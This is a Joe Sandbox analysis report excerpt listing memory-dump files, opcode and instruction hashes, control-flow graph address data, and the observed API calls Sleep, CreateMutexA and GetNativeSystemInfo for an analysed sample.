                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 5d73be259df7046a4aace25825c15f79276d742113f726c1216eb9025b58bd1d
                                                                                                                                                                                                                                • Instruction ID: 8a4fd89fa6a4ceddff799d7099ede5d15e47b01702f55a0163e8017e47a6ca77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d73be259df7046a4aace25825c15f79276d742113f726c1216eb9025b58bd1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8313B31B001409BEB08ABBCD8897AFB762EFC3316F204719E4149B3D6D7B599848763

Control-flow Graph
• [Graph rendering omitted: basic blocks 5a54d-5a9a8; the Sleep and CreateMutexA calls sit in block 5a94e-5a994, reached via the call to 86c6a at 5a944-5a949]
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: ae835cc3c57642841cce1dbd1fc8c3cc47aca87bf3b9e60e5cd5664408b24086
• Instruction ID: 4a5429ee0b7472948e3284689b394d1f26a184f082a811b1803209cb1d8e3a7d
• Opcode Fuzzy Hash: ae835cc3c57642841cce1dbd1fc8c3cc47aca87bf3b9e60e5cd5664408b24086
• Instruction Fuzzy Hash: 58312C317001448BEB08DB78DC89BAFB762EB87316F244718E814DB3D5D77599848753

Control-flow Graph
• [Graph rendering omitted: basic blocks 5a682-5a9a8; the Sleep and CreateMutexA calls sit in block 5a94e-5a994, reached via the call to 86c6a at 5a949]
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: 8a5c3f32aa8c48c8895f1c41d2d79f6a778b9cf28f8bbceb2b0d78dc47ba9a34
• Instruction ID: 6bd0d905bea542da8b761df657b334457bbc98fd7632d36029016176b1ae907d
• Opcode Fuzzy Hash: 8a5c3f32aa8c48c8895f1c41d2d79f6a778b9cf28f8bbceb2b0d78dc47ba9a34
• Instruction Fuzzy Hash: 7A312831B042448BEB08DB78DC897AFB7A2EB87312F248718E814DB3D5C77599848763

Control-flow Graph (legend: Executed / Not Executed); rendered graph data (basic-block address ranges and edges) omitted.
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: c7ddcf1e5cfb1dbbdd10ad7c8595dd13bee10e23ba172cf25831762562caa45c
                                                                                                                                                                                                                                • Instruction ID: e4fa8ca813f1d6d97d64dde43676f85f22b84f10fe28fc289e457673c77f05f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7ddcf1e5cfb1dbbdd10ad7c8595dd13bee10e23ba172cf25831762562caa45c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7214931704240DBFB189B6CEC8976EB7A6EBC2312F204719E818CB3D5DB75A9848752

Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph 525 5a856-5a86e 526 5a870-5a87c 525->526 527 5a89c-5a89e 525->527 528 5a892-5a899 call 6d663 526->528 529 5a87e-5a88c 526->529 530 5a8a0-5a8a7 527->530 531 5a8a9-5a8b1 call 57d30 527->531 528->527 529->528 533 5a94e-5a987 call 86c6a Sleep CreateMutexA 529->533 535 5a8eb-5a916 call 680c0 530->535 540 5a8e4-5a8e6 531->540 541 5a8b3-5a8bb call 57d30 531->541 546 5a98e-5a994 533->546 540->535 541->540 547 5a8bd-5a8c5 call 57d30 541->547 548 5a9a7-5a9a8 546->548 549 5a996-5a998 546->549 547->540 553 5a8c7-5a8cf call 57d30 547->553 549->548 551 5a99a-5a9a5 549->551 551->548 553->540 557 5a8d1-5a8d9 call 57d30 553->557 557->540 560 5a8db-5a8e2 557->560 560->535
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: d961b278019fbe9e4e46904b45a25a6f0befba3bd0bb16a23e421e725ffd9413
• Instruction ID: b2553ebaec25046f8996adf11e515336b9d7b66ecd5d01aa442db866f8ca7c9c
• Opcode Fuzzy Hash: d961b278019fbe9e4e46904b45a25a6f0befba3bd0bb16a23e421e725ffd9413
• Instruction Fuzzy Hash: A6213031344101DAFB246768984677F73A6DF83302F244F16ED08D63D2CF7A558992A3

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 502 5a34f-5a35b 503 5a371-5a39a call 6d663 502->503 504 5a35d-5a36b 502->504 510 5a39c-5a3a8 503->510 511 5a3c8-5a916 call 680c0 503->511 504->503 505 5a93a 504->505 507 5a953-5a994 Sleep CreateMutexA 505->507 508 5a93a call 86c6a 505->508 518 5a9a7-5a9a8 507->518 519 5a996-5a998 507->519 508->507 514 5a3be-5a3c5 call 6d663 510->514 515 5a3aa-5a3b8 510->515 514->511 515->505 515->514 519->518 522 5a99a-5a9a5 519->522 522->518
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: 148c45a5899c8476fb2a3a29bfbaa8ff0cfa6046e2f8126b3d73e01f29dae6d6
• Instruction ID: 36cd4e0386293b2cd34ad454ed5f8c767f2d96bc52515be4a1583d97cd51768a
• Opcode Fuzzy Hash: 148c45a5899c8476fb2a3a29bfbaa8ff0cfa6046e2f8126b3d73e01f29dae6d6
• Instruction Fuzzy Hash: F1217C317042409BEB189B6CEC8576EB7A2DBD3316F244719F808DB3D5CB75A6848363

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 561 57d30-57db2 call 840f0 565 58356-58373 call 6cff1 561->565 566 57db8-57de0 call 67a00 call 55c10 561->566 573 57de4-57e06 call 67a00 call 55c10 566->573 574 57de2 566->574 579 57e08 573->579 580 57e0a-57e23 573->580 574->573 579->580 583 57e25-57e34 580->583 584 57e54-57e7f 580->584 585 57e36-57e44 583->585 586 57e4a-57e51 call 6d663 583->586 587 57e81-57e90 584->587 588 57eb0-57ed1 584->588 585->586 591 58374 call 86c6a 585->591 586->584 593 57ea6-57ead call 6d663 587->593 594 57e92-57ea0 587->594 589 57ed7-57edc 588->589 590 57ed3-57ed5 GetNativeSystemInfo 588->590 595 57edd-57ee6 589->595 590->595 602 58379-5837f call 86c6a 591->602 593->588 594->591 594->593 600 57f04-57f07 595->600 601 57ee8-57eef 595->601 606 582f7-582fa 600->606 607 57f0d-57f16 600->607 604 57ef5-57eff 601->604 605 58351 601->605 609 5834c 604->609 605->565 606->605 612 582fc-58305 606->612 610 57f29-57f2c 607->610 611 57f18-57f24 607->611 609->605 614 582d4-582d6 610->614 615 57f32-57f39 610->615 611->609 616 58307-5830b 612->616 617 5832c-5832f 612->617 620 582e4-582e7 614->620 621 582d8-582e2 614->621 622 57f3f-57f9b call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 615->622 623 58019-582bd call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 615->623 624 58320-5832a 616->624 625 5830d-58312 616->625 618 58331-5833b 617->618 619 5833d-58349 617->619 618->605 619->609 620->605 627 582e9-582f5 620->627 621->609 646 57fa0-57fa7 622->646 659 582c3-582cc 623->659 624->605 625->624 629 58314-5831e 625->629 627->609 629->605 648 57fa9 646->648 649 57fab-57fcb call 88bbe 646->649 648->649 656 58002-58004 649->656 657 57fcd-57fdc 649->657 656->659 660 5800a-58014 656->660 661 57ff2-57fff call 6d663 657->661 662 57fde-57fec 657->662 659->606 664 582ce 659->664 660->659 661->656 662->602 662->661 664->614
APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00057ED3
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
